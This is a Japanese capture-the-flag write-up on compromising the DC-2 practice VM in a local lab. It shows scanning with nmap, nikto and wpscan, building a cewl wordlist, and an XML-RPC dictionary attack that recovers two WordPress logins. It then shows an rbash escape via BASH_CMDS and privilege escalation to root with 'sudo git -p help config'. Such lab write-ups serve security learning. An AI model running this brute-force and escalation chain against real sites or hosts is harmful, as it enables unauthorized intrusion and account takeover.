DC-2 Write Up
virtual boxでDC-2を起動させて、ターミナルで
┌──(root💀snowyowl)-[~]
└─# netdiscover 11 Captured ARP Req/Rep packets, from 7 hosts. Total size: 516
IP At MAC Address Count Len MAC Vendor / Hostname
------------------------------------------------------------
192.168.3.13 08:00:27:a8:0d:dc 1 60 PCS Systemtechnik GmbH
192.168.3.1 30:f7:72:be:b9:b9 4 168 >Hon Hai Precision Ind. Co.,Ltd. 192.168.3.2 10:6f:3f:e6:28:40 1 60 BUFFALO.INC
192.168.3.7 44:09:b8:8c:f4:72 1 60 Salcomp (Shenzhen) CO., LTD. 192.168.3.14 9e:29:3c:88:76:24 1 42 Unknown vendor
192.168.3.15 70:bc:10:6a:f6:c1 2 84 Microsoft Corporation 192.168.10.1 30:f7:72:be:b9:b9 1 42 Hon Hai Precision Ind. Co.,Ltd.
virtualboxは、PCS Systemtechnik GmbHなので、DC-2のローカルipは、192.168.3.13である。
nmapでこのipを確認する。
ここで使っているオプション
-sSは、ステルススキャンで3ハンドシェイクのACKパケットを返さない。
-Aは、OSとその細かいバージョンの特定
-p-は、全ポート指定(0と9100を除く
┌──(root💀snowyowl)-[~]
└─# nmap -sS -A 192.168.3.13 -p- Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 20:15 JST Nmap scan report for dc-2 (192.168.3.13) Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION 80/tcp
open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) MAC Address: 08:00:27:A8:0D:DC (Oracle VirtualBox virtual NIC) Device type: general purpose Running:
Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details:
Linux 3.2 - 4.9 Network Distance:
1 hop Service Info: OS: Linux;
CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.60 ms dc-2 (192.168.3.13) OS and Service detection performed.
Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
このnmapの結果から、
・このサーバーはwebサーバーである。(Apache2.4.10、CMSはwordpressが使われている。
・普通22番ポートがsshのはずなのだが、これは7744番ポートに設定されている。
というこの2つがわかる。
webサーバーということで、ブラウザでipを入力すると。。。
ローカルwebサーバーなので、DNSに問い合わせしても、出てこない。
なので、/etc/hostsを書き換える。
hostsファイルに追記すると、
きちんと表示される。
次に、niktoで公開ディレクトリを探る。
┌──(root💀snowyowl)-[~]
└─# nikto -h http://192.168.3.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.13
+ Target Hostname: 192.168.3.13
+ Target Port: 80
+ Start Time: 2021-07-27 19:35:47 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ Uncommon header 'link' found, with multiple values: (<http://dc-2/index.php/wp-json/>; rel="https://api.w.org/",<http://dc-2/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2021-07-27 19:37:12 (GMT9) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
前回のDC-1は、公開ディレクトリが多くあったが、今回は全然ない。
(/wp-login.php: Wordpress login found
webサーバーのApacheの脆弱性も探すが、目立ったexploitがない。
┌──(root💀snowyowl)-[~]
└─# searchsploit "Apache 2.4.10"
-----------------------------------------------------------------
Exploit Title
| Path
-----------------------------------------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution
| php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
| linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service
| multiple/dos/26710.txt
Apache OpenSSL - 'OpenFuck.c' Remote BufferOverflow
| unix/remote/21671.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)
| unix/remote/764.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
| unix/remote/47080.c
Apache OpenMeetings - '.ZIP' File Directory Traversal
| linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing
| multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
| unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)
| multiple/remote/6229.txt
-----------------------------------------------------------------
Shellcodes: No Results
webサーバーからは、攻められないことがわかったので、CMSから攻めていくことにする。前回のDC-1と同じ流れで、DC-1は、drupalでした。
wpsには、wpscanという公式が配布しているセキュリティーツールがあるので、これを使う。
https://ja.wordpress.org/plugins/wpscan/
wpscanには、面白いオプションが多くあるので、
$man wpscan
で色々見てみると参考になる。
今回のオプション
--url URLで、対象のURLを指定する。
-e uで、ユーザー名を出力。
┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:08:38 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 27 21:08:44 2021
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.674 KB
[+] Data Received: 514.805 KB
[+] Memory used: 160.348 MB
[+] Elapsed time: 00:00:06
・ユーザーは、admin・jerry・tomの 3つ
が分かったので、この3つのアカウントのユーザー名とパスワードを探す。
dc-2のwebページのflagのところに、cewlを使うといいと書いているので、
cewlコマンドを使う。
cewlは、webページの文字からランダムに単語を生み出す。
種つきパスワードジェネレータ。
┌──(root💀snowyowl)-[~] └─# cewl -w dc2-password.txt http://dc-2/
cewlで作ったパスワードテキストを指定して、3つのアカウントのパスワードを
探す。
-P パスワードファイルで、辞書攻撃。
┌──(root💀snowyowl)-[~] └─# cewl -w dc2-password.txt http://dc-2/
cewlで作ったパスワードテキストを指定して、3つのアカウントのパスワードを 探す。 -P パスワードファイルで、辞書攻撃。
┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -P dc2-passworrd.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:10:03 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups -
Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs -
Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin /
log Time: 00:01:26 <========> (646 / 1121) 57.62% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 27 21:11:38 2021
[+] Requests Done: 801
[+] Cached Requests: 49
[+] Data Sent: 360.183 KB
[+] Data Received: 427.544 KB
[+] Memory used: 243.969 MB
[+] Elapsed time: 00:01:34
2つのアカウントのパスワードが分かった。
・ | Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
これを使って、DC-2のwordpress管理者画面にログインする。
さっきのniktoでわかったログインディレクトリに移動して、ログインする。
flag2を確認するとまだflagがあることがわかる。
次は、nmapで調べてわかったsshでDC-2に接続する。
ここで、
$ssh tom@192.168.3.13
としても、接続できない。
このサーバーのsshポートは7744なので、ポートを指定する必要がある。
$ssh tom@192.168.3.13 -p 7744
パスワードをきかれるが、さっき分かったパスワードを入力する。
lsコマンドで表示すると、flag3.txtを発見。
catコマンドで開こうとしても開けない
-rbashでコマンドに制限がかかっているからである。
普段の環境では、chshコマンドで-rbashからbashに移れるのだが、DC-2では移れない。
そのため、
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin
を使って、bashに移行する。
flag3.txtを表示すると、
となる。
flag4
どうやら、管理者権限になってほしいらしい。
管理者権限になろうと、sudoコマンドなどを入力してもうまくいかない。
そのため、
sudo git -p help config
を使う。
インタラクティブなシステムシェルを生成することによって、今回のような制限された環境から抜け出せる。
https://gtfobins.github.io/gtfobins/git/
sudoコマンドが使える環境であれば、使えるので汎用性高そう。
rootに移って、catコマンドで表示する。